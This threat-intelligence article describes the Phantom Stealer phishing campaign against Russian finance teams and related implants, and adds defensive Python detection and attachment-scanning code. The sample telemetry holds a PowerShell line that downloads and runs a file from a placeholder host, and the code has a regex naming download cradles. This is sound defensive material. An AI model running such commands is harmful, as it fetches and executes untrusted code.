Phantom Stealer: The Ghost That Slips Through the Inbox
- Javier Conejo del Cerro
- 5 hours ago
- 3 min. read

Ghosts are not meant to break doors down. They pass through them.
Phantom Stealer follows that same logic. It does not rely on exploits, zero-days, or noisy malware delivery. Instead, it arrives quietly, disguised as routine financial correspondence, mounts itself invisibly, and drains sensitive data before anyone realizes an intrusion has taken place.
Tracked as Operation MoneyMount-ISO, this active phishing campaign uncovered by Seqrite Labs targets Russian organizations, with a strong focus on finance and accounting departments. By abusing ISO files hidden inside ZIP attachments, attackers turn everyday administrative workflows into invisible entry points for large-scale credential and data theft.
Phase 1: The Haunting Begins — Trust in Financial Communication
The campaign’s success begins with familiarity. Victims receive phishing emails crafted to resemble legitimate financial notifications, typically urging recipients to confirm a recent bank transfer or review payment details.
Primary targets include:
Finance and accounting teams
Payroll and procurement staff
Legal departments
In many cases, the emails originate from compromised corporate mail servers, giving them an added layer of credibility. The message does not look suspicious. It looks urgent, routine, and trustworthy.
This is how the ghost enters the room.
Phase 2: The Hidden Door — ISO Files as an Invisible Vector
Attached to the phishing email is a ZIP archive that purports to contain transaction details. Inside the ZIP is a malicious ISO image labeled as a bank transfer confirmation.
When the recipient double-clicks it, Windows (8 and later) mounts the ISO as a virtual CD-ROM drive with no extra tooling; its contents then look like files on an ordinary drive, so the lure never presents the user with something that looks like an executable. Two practitioner caveats apply: many gateway and endpoint policies inspect .exe and Office attachments but let disk images through untouched, and until Microsoft changed the behaviour in late 2022 the files inside a mounted image did not inherit the Mark-of-the-Web from the downloaded container, so SmartScreen and similar checks that key on it were skipped. Patched hosts now propagate the mark, which is one more reason the image format on its own should be treated as a delivery vector rather than as a trusted container.
Inside the mounted image sits a DLL, reported as CreativeAI.dll, that loads Phantom Stealer. A DLL cannot run by itself; it is brought in through a host process such as rundll32.exe or regsvr32.exe, or by a launcher shipped alongside it. The summary above does not name the loader, but the net effect is that the victim never consciously runs a traditional binary, and the execution appears to originate from a freshly mounted drive letter rather than from the user's profile.
The door was never locked. It was simply invisible.
Phase 3: The Ghost at Work — Data Theft and Evasion
Once executed, Phantom Stealer immediately focuses on harvesting valuable data while staying hidden. Its capabilities include extracting:
Cryptocurrency wallet data from Chromium browser extensions and desktop wallet apps
Browser passwords, cookies, and saved credit card details
Discord authentication tokens
Arbitrary files from the system
Keystrokes and clipboard contents
To avoid detection, Phantom Stealer performs checks to identify virtualized, sandboxed, or analysis environments. If such conditions are detected, the malware aborts execution, leaving little trace behind. For defenders this also means that automated detonation in a stock sandbox may report the sample as benign; analysis environments need to hide the usual virtualization artifacts before a verdict is trusted.
Data exfiltration is flexible and resilient, using:
Telegram bots
Attacker-controlled Discord webhooks
FTP servers
Telegram and Discord are legitimate services reached over HTTPS, so the stolen data travels to well-known domains and blends into normal traffic; egress policy on those services and on outbound FTP from workstations is the practical network-side control.
The ghost feeds quietly, then disappears.
Phase 4: Parallel Apparitions — DUPERUNNER and AdaptixC2
Alongside Operation MoneyMount-ISO, researchers observed parallel phishing campaigns targeting Russian organizations, particularly HR and payroll departments. These operations, tracked as DupeHike and attributed to UNG0902, use different lures but follow a similar deceptive philosophy.
In these campaigns:
ZIP files contain PDF and LNK decoys
The LNK file executes PowerShell to download a previously undocumented implant named DUPERUNNER
DUPERUNNER displays a decoy document while loading AdaptixC2, an open-source command-and-control framework
AdaptixC2 is injected into legitimate Windows processes such as:
explorer.exe
notepad.exe
msedge.exe
This allows attackers to blend into normal system activity while maintaining persistent remote access.
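As an added example, not code from Seqrite Labs, Intrinsec or The Hacker News, the following Python turns the process-level traces described so far into detection logic over Sysmon-style events: a DLL loaded by rundll32.exe or regsvr32.exe from a drive letter that is not a fixed disk (the mounted-ISO step of Phase 2), explorer.exe spawning PowerShell with a download primitive on its command line (what a double-clicked LNK looks like in telemetry), and a remote thread created in explorer.exe, notepad.exe or msedge.exe by a binary outside the Windows directory (the injection step). Field names follow Sysmon Event ID 1 and Event ID 8; the event records, the rundll32 command line for CreativeAI.dll and the FIXED_DRIVES set are constructed assumptions, not observed data.

```python
"""Detection logic for the process traces this page describes, over Sysmon-style events.

Added example; not code from Seqrite Labs, Intrinsec or The Hacker News. Field names
follow Sysmon Event ID 1 (ProcessCreate) and 8 (CreateRemoteThread). The events at the
bottom are constructed for the demo, and FIXED_DRIVES is an assumption the caller
supplies (in production, derive it from the host's volume inventory).
"""
import re
from typing import Optional

FIXED_DRIVES = {"C:"}                         # assumption: the only fixed disk on the host
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
INJECTION_TARGETS = {"explorer.exe", "notepad.exe", "msedge.exe"}
SYSTEM_DIR = "c:\\windows\\"
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|invoke-expression|\biex\b|-e(nc|ncodedcommand)?\b",
    re.I,
)
DLL_PATH = re.compile(r"([A-Za-z]:\\[^\s\",]+\.dll)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def drive_of(path: str) -> str:
    return path[:2].upper()


def dll_from_mounted_volume(ev: dict) -> Optional[str]:
    """Phase 2: a DLL launched straight out of a mounted ISO sits on a drive letter
    that is not one of the host's fixed disks."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in DLL_LOADERS:
        return None
    for dll in DLL_PATH.findall(ev["CommandLine"]):
        if drive_of(dll) not in FIXED_DRIVES:
            return f"{basename(ev['Image'])} loading {dll} from non-fixed volume {drive_of(dll)}"
    return None


def lnk_powershell_cradle(ev: dict) -> Optional[str]:
    """Phase 4: a double-clicked LNK shows up as explorer.exe spawning PowerShell
    with a download primitive on the command line."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if basename(ev["ParentImage"]) != "explorer.exe":
        return None
    m = DOWNLOAD_CRADLE.search(ev["CommandLine"])
    return f"explorer.exe -> PowerShell with download primitive '{m.group(0)}'" if m else None


def remote_thread_into_host_process(ev: dict) -> Optional[str]:
    """Phase 4: the C2 is injected into explorer/notepad/msedge; a remote thread
    created in those by a binary outside the Windows directory is the trace."""
    if ev["EventID"] != 8 or basename(ev["TargetImage"]) not in INJECTION_TARGETS:
        return None
    if ev["SourceImage"].lower().startswith(SYSTEM_DIR):
        return None
    return f"{ev['SourceImage']} created a remote thread in {basename(ev['TargetImage'])}"


RULES = (dll_from_mounted_volume, lnk_powershell_cradle, remote_thread_into_host_process)


def evaluate(events: list) -> list:
    """Run every rule over every event; returns (rule name, detail) pairs in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append((rule.__name__, detail))
    return alerts


# Constructed sample telemetry (not real logs): one benign and one suspicious
# instance of each pattern, so evaluate() yields exactly three alerts.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe D:\CreativeAI.dll,#1"},          # invocation is assumed
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell.exe Get-ChildItem C:\Reports"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iwr http://203.0.113.5/x -OutFile $env:TEMP\\run.exe; & $env:TEMP\\run.exe\""},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\ivanov\AppData\Local\Temp\run.exe", "TargetImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The drive-letter heuristic in the first rule also fires on removable media, so in production enrich the event with the volume's drive type (or the \Device\CdRom object name) before alerting; the point is that a DLL whose home is a transient volume, mounted seconds earlier, is the observable the page's delivery chain cannot avoid.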
Phase 5: A Crowded Haunted House — Additional Tooling
Phantom Stealer and AdaptixC2 are not alone. Other phishing campaigns targeting finance, legal, and aerospace sectors in Russia have been observed deploying:
Cobalt Strike
Formbook
DarkWatchman
PhantomRemote
In several cases, phishing emails were sent from compromised Russian corporate infrastructure, further blurring the line between legitimate and malicious communication.
Some campaigns also redirected victims to credential-harvesting login pages hosted on IPFS and Vercel, targeting Microsoft Outlook credentials and entities such as Bureau 1440 in the Russian aerospace sector.
Phase 6: Strategic Context — Espionage, Hacktivism, and Pressure
French cybersecurity firm Intrinsec linked several aerospace-focused intrusions to hacktivist groups aligned with Ukrainian interests. Activity observed between June and September 2025 overlaps with clusters such as:
Hive0117
Operation CargoTalon
Rainbow Hyena (aka Fairy Trickster, Head Mare, PhantomCore)
These operations appear to target organizations cooperating with Russia’s military, reflecting a blend of cyber espionage, hacktivism, and geopolitical pressure rather than purely criminal motivation.
Defensive Measures: Revealing the Ghost
Defending against Phantom Stealer and related campaigns requires removing the invisibility attackers rely on.
Organizations should:
Block or restrict disk-image attachments (ISO, IMG, VHD, VHDX) at the email gateway, identifying them by content rather than by file extension
Treat ZIP-delivered disk images as high-risk and inspect archive contents recursively
Monitor rundll32.exe and regsvr32.exe loading DLLs from drive letters that are not fixed disks, which is what execution from a freshly mounted image looks like
Constrain PowerShell (script block logging, Constrained Language Mode, AppLocker or WDAC policy) and block LNK files arriving inside archives
Harden email authentication (SPF, DKIM, DMARC) and monitor for abuse of internal mail servers, since several of these campaigns sent from compromised corporate infrastructure
Assume finance-related lures are a primary attack vector and brief finance, payroll, procurement, and legal staff accordingly
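The gateway check that the first two items call for, written here as an added Python example rather than as any vendor's code, and also illustrating the ZIP to ISO to DLL chain from Phase 2: it opens ZIP attachments, recognises disk images by the ISO 9660 "CD001" descriptor instead of trusting the extension, carves PE DLLs and LNK files at the 2048-byte sector boundaries inside the image without parsing the directory tree, and caps recursion depth and decompressed member size so a crafted archive cannot exhaust the scanner. The sample archive it builds is constructed for the demo and is not a real sample; the member names are assumptions.

```python
"""Gateway-side inspection of the ZIP -> ISO -> DLL attachment chain.

Added example, not code from Seqrite Labs or The Hacker News. Format checks follow the
public ISO 9660, PE and Shell Link specs; the archive built by build_sample_zip() is
constructed here to exercise the scanner and is not a real malware sample.
"""
import io
import struct
import zipfile

ISO_PVD_OFFSET = 16 * 2048          # primary volume descriptor lives in sector 16
IMAGE_EXTS = (".iso", ".img", ".vhd", ".vhdx", ".udf")
LNK_HEADER = (b"\x4c\x00\x00\x00"   # HeaderSize 0x4C
              b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")  # LinkCLSID
IMAGE_FILE_DLL = 0x2000
MAX_DEPTH = 3                        # nested archives beyond this are flagged, not opened
MAX_MEMBER = 64 * 1024 * 1024        # decompressed-size cap per member (zip-bomb guard)


def is_iso9660(data) -> bool:
    # byte 0 of the PVD is the descriptor type (1), bytes 1-5 the "CD001" identifier
    return data[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] == b"CD001"


def is_lnk(data) -> bool:
    return data[:20] == LNK_HEADER


def pe_characteristics(data):
    """Return IMAGE_FILE_HEADER.Characteristics, or None if data is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 22)[0]   # sig(4) + 18 bytes into file header


def carve_image(name: str, data: bytes) -> list:
    """ISO 9660 stores file data on 2048-byte sector boundaries, so scanning for PE
    and LNK headers at those offsets finds payloads without parsing the directory tree."""
    found = []
    mv = memoryview(data)             # avoid copying the image once per sector
    for off in range(0, len(data), 2048):
        chars = pe_characteristics(mv[off:])
        if chars is not None:
            kind = "PE DLL" if chars & IMAGE_FILE_DLL else "PE executable"
            found.append((name, f"{kind} at image offset {off:#x}"))
        elif is_lnk(mv[off:]):
            found.append((name, f"LNK at image offset {off:#x}"))
    return found


def scan_attachment(name: str, data: bytes, depth: int = 0) -> list:
    """Return (member path, finding) pairs for one attachment, recursing into ZIPs."""
    findings = []
    if is_iso9660(data) or name.lower().endswith(IMAGE_EXTS):
        findings.append((name, "disk image delivered as attachment"))
        findings.extend(carve_image(name, data))
        return findings
    if is_lnk(data):
        findings.append((name, "Windows shortcut (LNK)"))
    chars = pe_characteristics(data)
    if chars is not None:
        findings.append((name, "PE DLL" if chars & IMAGE_FILE_DLL else "PE executable"))
    if zipfile.is_zipfile(io.BytesIO(data)):
        if depth >= MAX_DEPTH:
            findings.append((name, "nested archive beyond depth limit, not opened"))
            return findings
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                child = f"{name}/{info.filename}"
                if info.file_size > MAX_MEMBER:        # check the declared size before inflating
                    findings.append((child, "oversized member, not inspected"))
                    continue
                findings.extend(scan_attachment(child, zf.read(info), depth + 1))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample mirroring the described lure: a ZIP holding an ISO that
    carries a minimal PE marked as a DLL. Not a real sample; names are assumed."""
    dll = bytearray(0x100)
    dll[:2] = b"MZ"
    struct.pack_into("<I", dll, 0x3C, 0x80)                       # e_lfanew
    dll[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", dll, 0x80 + 22, 0x0002 | 0x0100 | IMAGE_FILE_DLL)
    iso = bytearray(2048 * 24)
    iso[ISO_PVD_OFFSET:ISO_PVD_OFFSET + 7] = b"\x01CD001\x01"    # type, identifier, version
    iso[2048 * 20:2048 * 20 + len(dll)] = dll                     # file data on a sector boundary
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Bank_Transfer_Confirmation.iso", bytes(iso))
        zf.writestr("readme.txt", "Please confirm the attached transfer.")
    return buf.getvalue()


if __name__ == "__main__":
    for path, finding in scan_attachment("transfer_details.zip", build_sample_zip()):
        print(f"{path}: {finding}")
```

Detecting the image by its volume descriptor matters because a renamed .iso still mounts when the user opens it with the right handler; the extension list is only a fallback for formats such as VHD whose signature sits elsewhere. The sector-boundary carve is deliberately cheap and will miss a PE that is packed or that starts mid-sector, so treat it as a triage signal and route anything flagged as a disk image to full static analysis regardless of what the carve finds.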
The threat does not rely on complexity. It relies on being ignored.
Phantom Stealer is dangerous not because it breaks systems, but because it blends in. It turns standard operating procedures into silent compromises, using formats users no longer question and workflows security teams often overlook.
In an environment where attackers no longer need exploits, visibility becomes the strongest defense.
If the file looks harmless, mounts quietly, and executes without a prompt, it is already too late.
Ghosts thrive in places no one thinks to look.
The Hacker News